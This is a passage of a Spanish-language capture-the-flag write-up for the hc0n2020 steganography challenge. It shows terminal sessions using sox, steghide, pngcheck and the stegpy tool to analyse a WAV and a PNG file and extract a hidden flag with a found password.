<tr style="height: 0pt;"><td style="background-color: #1e1e1e; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">root@1v4n:~/CTF/hc0n2020/stego</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># sox wind.wav -n spectrogram</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">root@1v4n:~/CTF/hc0n2020/stego/samurai_GRANTED/_samurai.png.extracted</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># md5sum spectrogram.png</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">108c28dfae99fcd7d8b080aac7c42bb0 spectrogram.png</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">root@1v4n:~/CTF/hc0n2020/stego/samurai_GRANTED/_samurai.png.extracted</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">#</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 218px; overflow: hidden; width: 339px;"><img height="218" src="https://lh4.googleusercontent.com/ZJB-ATGOeWrT9Xe5qfKynr0XKAHPJm4izCTpSvHKGbWmOEUV8fjeHWV0swcS7Gt16cT-B82GQvRR8NlQDyXkpQr4Vqx6EVYN8-MBuQwDry2Jbca1Hvl1jRMHCeXHRBRhH_HWiL_R" style="margin-left: 0px; margin-top: 0px;" width="339" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Volvemos a la imagen PNG. Confirmamos que hay LSB stego con steghide info y usamos pngcheck -vtp7f para </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">buscar fragmentos rotos opcionales / correctos. Descubrimos una cadena que revela al autor de la herramienta </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">esteganográfica "dhsdshdhk" </span><a href="https://github.com/dhsdshdhk/stegpy.git" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://github.com/dhsdshdhk/stegpy.git</span></a></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div align="left" dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
<tr style="height: 0pt;"><td style="background-color: #1e1e1e; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">root@1v4n:~/CTF/hc0n2020/stego/_samurai.png.extracted</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># steghide info wind.wav</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">"wind.wav"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">:</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> formato: wave audio, PCM encoding</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> capacidad: 40,4 KB</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'Intenta informarse sobre los datos adjuntos? (s/n) s</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Anotar salvoconducto:</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">steghide: '</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">no pude extraer ning</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'n dato con ese salvoconducto!</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">root@1v4n:~/CTF/hc0n2020/stego# pngcheck -vtp7f samurai.png</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">File: samurai.png (439822 bytes)</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> chunk IHDR at offset 0x0000c, length 13</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> 480 x 720 image, 24-bit RGB, non-interlaced</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> chunk IDAT at offset 0x00025, length 65536</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> zlib: deflated, 32K window, maximum compression</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> chunk IDAT at offset 0x10031, length 65536</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> chunk IDAT at offset 0x2003d, length 29925</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> chunk tEXt at offset 0x2752e, length 16, keyword: Author</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> dhsdshdhk</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> chunk IEND at offset 0x2754a, length 0</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> additional data after IEND chunk</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> invalid chunk name "" (14 03 00 00)</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> chunk at offset 0x27556, length 1347093252: illegal (unless recently approved) unknown, public chunk</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> additional data after IEND chunk</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: invalid chunk length (too large)</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ERRORS DETECTED in samurai.png</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Instalamos Stegpy y pasamos a extraer nuestra bandera con la ayuda de la contraseña "SHINOBI"</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div align="left" dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
<tr style="height: 0pt;"><td style="background-color: #1e1e1e; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">root@1v4n:~/Stego</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># git clone https://github.com/dhsdshdhk/stegpy.git</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Clonando en </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'stegpy'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">...</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">remote: Enumerating objects: 256, </span><span style="background-color: #1e1e1e; color: #569cd6; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">done</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">remote: Total 256 (delta 0), reused 0 (delta 0), pack-reused 256</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Recibiendo objetos: 100% (256/256), 6.91 MiB | 3.64 MiB/s, listo.</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Resolviendo deltas: 100% (131/131), listo.</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">root@1v4n:~/Stego</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># cd stegpy/</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">root@1v4n:~/Stego/stegpy</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># pip3 install stegpy</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Collecting stegpy</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Downloading https://files.pythonhosted.org/packages/ef/80/c127a260cc523d9e7ffeb054876e387539ca624685d77a70149f1f6ec372/stegpy-0.0.1-py3-none-any.whl</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Requirement already satisfied: Pillow </span><span style="background-color: #1e1e1e; color: #569cd6; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">in</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> /usr/</span><span style="background-color: #1e1e1e; color: #4ec9b0; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">local</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">/lib/python3.7/dist-packages (from stegpy) (6.2.1)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Requirement already satisfied: cryptography </span><span style="background-color: #1e1e1e; color: #569cd6; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">in</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> /usr/</span><span style="background-color: #1e1e1e; color: #4ec9b0; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">local</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">/lib/python3.7/dist-packages (from stegpy) (2.8)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Requirement already satisfied: numpy </span><span style="background-color: #1e1e1e; color: #569cd6; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">in</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> /usr/</span><span style="background-color: #1e1e1e; color: #4ec9b0; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">local</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">/lib/python3.7/dist-packages (from stegpy) (1.16.1)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Requirement already satisfied: six>=1.4.1 </span><span style="background-color: #1e1e1e; color: #569cd6; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">in</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> /usr/lib/python3/dist-packages (from cryptography->stegpy) (1.13.0)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Requirement already satisfied: cffi!=1.11.3,>=1.8 </span><span style="background-color: #1e1e1e; color: #569cd6; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">in</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> /usr/</span><span style="background-color: #1e1e1e; color: #4ec9b0; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">local</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">/lib/python3.7/dist-packages (from cryptography->stegpy) (1.13.2)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Requirement already satisfied: pycparser </span><span style="background-color: #1e1e1e; color: #569cd6; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">in</span><span style="background-color: #1e1e1e; color: 